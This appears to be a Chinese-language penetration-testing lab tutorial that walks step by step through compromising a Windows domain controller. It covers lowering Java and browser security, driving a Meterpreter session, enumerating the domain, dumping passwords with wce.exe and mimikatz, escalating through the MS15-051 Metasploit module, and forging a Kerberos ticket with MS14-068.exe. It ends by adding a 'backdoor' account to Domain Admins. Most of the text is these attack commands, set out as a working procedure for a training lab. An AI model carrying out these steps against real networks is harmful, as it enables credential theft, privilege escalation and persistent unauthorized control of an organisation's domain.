综合渗透测试-使用Kerberos渗透测试域控服务器并获取权限
第二步,本课程衔接利用Java无效的数组索引漏洞进行鱼叉式网络钓鱼渗透测试课件,域用户在打开不受信任的java程序时,需降低java的安全级别,在控制面板中点击Java图标
切换到安全选项卡
调整安全级别为中(M)
然后重新设置IE浏览器的Internet选项,设置区域的安全级别为中,并关闭保护模式。
第三步,关闭域防火墙,需要域管理员用户名密码,点击关闭Windows防火墙
再参照上个课程的实验步骤进行操作,即可获得了一个域成员用户的shell。
第四步,回到Kali渗透机中,切换到session 2中,然后在meterpreter下使用命令shell进入命令终端
使用命令net config workstation查询当前登录域pyseclab.com,
使用命令whoami /all > sid.txt导出当前登录账号admin的sid值(记住这一信息在后面还会用到),并使用命令type查看sid.txt文件。
可以查询到该用户的一些特权信息。
从上面的结果中可以看出,由于管理员的安全策略,该用户没有管理员权限。
第五步,然后使用命令set log查找域控的名称信息,通过信息可以大致确定域控地址为
dcserver.pyseclab.com
为了验证我们的猜想是正确,使用命令Ctrl + z先将会话置于后台,退回到msf模式下,然后使用命令use post/windows/gather/enum_domain来获取域控制器的IP地址,
然后使用命令use post/windows/gather/enum_domain调用枚举模块并使用命令info查看模块的基本参数信息。
使用命令set session 2来指定运行该模块的会话,并使用命令exploit来运行此模块,反馈结果与猜想一致。
找到域控制器IP为172.16.1.200。
第六步,首先使用命令session -i 2切换回来,并使用命令shell进入终端,最后使用命令dir \\dcserver\c$(回到Meterpreter的会话中) 访问域控的c盘共享
访问被拒绝,当前的权限不够,我们通过Meterpreter上传一个wce.exe、mimikatz.exe、ms14-068.exe的提权工具。(由于本环境已经提前为大家上传上去了路径为c:\mimikatz\,所以此步骤可以省略)
第七步,然后使用命令shell切换回域成员靶机的命令行中,并运行mimikatz.exe程序,下面操作目的主要是为了生成一个黄金票据(Golden Ticket),并注入内存,为了使我们生成的票据起作用,首先我们需要将内存中已有的kerberos票据清除,清除方法是使用mimikatz的kerberos::purge命令,操作如下
(注意:最后必须使用exit命令退出mimikatz.exe否则将导致会话崩溃)
但是要注意使用MS14068.exe来生成一张高权限的kerberos服务票据,需要收集user1的用户密码,下面我们就wce.exe内网渗透工具做一个介绍:
Windows Credentials Editor (WCE)是一款功能强大的windows平台内网渗透工具,它可以列举登陆会话,并且可以添加、改变和删除相关凭据(例如:LM/NT hashes)。这些功能在内网渗透中能够被利用,例如,在windows平台上执行绕过hash或者从内存中获取NT/LM hashes(也可以从交互式登陆、服务、远程桌面连接中获取)以用于进一步的攻击,而且体积也非常小,是内网渗透手必备工具。
接下来尝试使用命令wce.exe -w以明文的方式来获取当前登录用户的密码
我们发现提示报错,原因可能为当前的用户由于安全策略的问题导致无法使用wce来导出本地用户的hash。
第八步,当前获取到的权限只能够在用户“user1”遍历低权限目录、上传和下载文件。下面的操作需要我们通过管理员权限才能继续完成,为此我们来分析一下系统上已经安装的安全补丁程序,通过使用Windows命令行的命令wmic qfe list来查找是否存在未修补的权限提升漏洞
输出结果清楚地表明Windows系统管理员并不经常性的更新域成员的系统补丁。靶机中缺少MS15-051漏洞的补丁包(编号KB3011780),可以对该漏洞进行利用。此漏洞影响了Windows内核模式驱动程序可导致本地权限提升,即通过该漏洞可使用“user1”的权限提升为NT AUTHORITY\SYSTEM:
使用命令use exploit/windows/local/ms15_051_client_copy_image来调用模块。并设置需要提权的会话,最后运行exploit来启动模块来进行提权操作。
使用命令getuid查看当前的用户权限,
再次使用命令shell进入命令终端,使用命令wce.exe -w来导出内存明文密码
下面我们通过MS14-068.exe工具来生成票据并登陆票据注入到内存中,在注入之前,我们先整理一下当前提取到的一些信息,User Sid根据实际的情况会发生变化
那么下面的命令格式为:MS14-068.exe -u <userName>@<domainName> -s <userSid> -d <domainControllerAddr> -p <明文密码>/--rc4 <ntlm哈希>
生成TGT后,使用命令mimikatz.exe打开软件,使用命令kerberos::ptc [email protected]
然后使用klist可以看到只有一个注入后的凭证了。
第九步,然后我们使用命令dir \\dcserver\c$来访问域控
访问成功,下面我们使用命令net group “Domain Controllers” /domain查询域控
使用命令net user backdoor p@ssw0rd /add /domain添加普通域用户
并使用命令net group “Domain Admins” backdoor /add /domain将普通域用户backdoor提升为域管理员
